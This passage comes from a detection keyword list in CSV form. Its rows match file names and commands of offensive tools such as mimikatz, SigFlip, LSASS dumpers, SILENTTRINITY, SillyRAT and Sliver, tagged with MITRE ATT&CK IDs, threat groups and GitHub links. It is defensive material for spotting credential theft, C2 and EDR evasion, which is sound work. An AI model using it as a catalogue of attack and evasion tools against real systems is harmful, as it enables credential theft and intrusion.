TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sid::modify*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sid::patch*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sid::query*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sigflip*/Bof/*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*SigFlip.exe -*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*SigFlip.WinTrustData*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*SigInject *,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*SigInject *.dll*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*SigLoader *,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*Sigloader *.dll*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*SigLoader.*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*SigLoader/sigloader.c*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*signal2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Signal-Labs/NtdllUnpatcher*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z -*SigPloit*,offensive_tool_keyword,SigPloit,SigPloit a signaling security testing framework dedicated to Telecom Security professionals and reasearchers to pentest and exploit vulnerabilites in the signaling protocols used in mobile operators regardless of the geneartion being in use. SigPloit aims to cover all used protocols used in the operators interconnects SS7. GTP (3G). Diameter (4G) or even SIP for IMS and VoLTE infrastructures used in the access layer and SS7 message encapsulation into SIP-T. Recommendations for each vulnerability will be provided to guide the tester and the operator the steps that should be done to enhance their security posture,T1573 - T1562 - T1189 - T1190 - T1201,TA0002 - TA0003 - TA0007 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/SigPloiter/SigPloit,1,1,N/A,N/A,1,7,2,2019-12-17T16:51:23Z,2017-03-30T03:46:03Z -*sigthief.exe.manifest*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,0,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*SigThief.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*sigthief.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*SigThief-master*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,1,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*sigwhatever.exe*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*Silent Lsass Dump*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,0,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*silenthound.py*,offensive_tool_keyword,SilentHound,Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/layer8secure/SilentHound,1,1,N/A,N/A,5,430,44,2023-01-23T20:41:55Z,2022-07-01T13:49:24Z -*silenthound_enum*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*silenthound_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*SilentHound-main*,offensive_tool_keyword,SilentHound,Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/layer8secure/SilentHound,1,1,N/A,N/A,5,430,44,2023-01-23T20:41:55Z,2022-07-01T13:49:24Z -*silentLsassDump*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*SilentMoonwalk.cpp*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,1,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z -*SilentMoonwalk.exe*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,1,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z -*SilentMoonwalk.sln*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,1,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z -*SilentMoonwalk-master*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,1,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z -*SilentProcessExitRegistrySetter.cpp*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,1,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*SilentProcessExitRegistrySetter.exe*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,1,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*SILENTTRINITY*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*silenttrinity*.dll*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*SillyRAT.git*,offensive_tool_keyword,SillyRAT,A Cross Platform multifunctional (Windows/Linux/Mac) RAT.,T1055.003 - T1027 - T1105 - T1005,TA0002 - TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/hash3liZer/SillyRAT,1,1,N/A,N/A,6,594,151,2023-06-23T18:49:43Z,2020-05-10T17:37:37Z -*sillyrat.py*,offensive_tool_keyword,SillyRAT,A Cross Platform multifunctional (Windows/Linux/Mac) RAT.,T1055.003 - T1027 - T1105 - T1005,TA0002 - TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/hash3liZer/SillyRAT,1,1,N/A,N/A,6,594,151,2023-06-23T18:49:43Z,2020-05-10T17:37:37Z -*silver*/beacon.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*silver*implant.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*SilverPoision*,offensive_tool_keyword,Github Username,Github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/SilverPoision,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*SilverPoision/Rock-ON*,offensive_tool_keyword,Rock-ON,Rock-On is a all in one recon tool that will help your Recon process give a boost. It is mainley aimed to automate the whole process of recon and save the time that is being wasted in doing all this stuffs manually. A thorough blog will be up in sometime. Stay tuned for the Stable version with a UI,T1590 - T1210.001 - T1190 - T1213,TA0007 - TA0002 - TA0003,N/A,N/A,Information Gathering,https://github.com/SilverPoision/Rock-ON,1,1,N/A,N/A,3,288,70,2019-11-30T04:00:03Z,2019-06-10T04:42:32Z -*SimoneLazzaris/ditty*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SimoneLazzaris/ditty,1,1,N/A,N/A,1,2,1,2022-03-10T16:15:14Z,2022-03-09T09:20:27Z 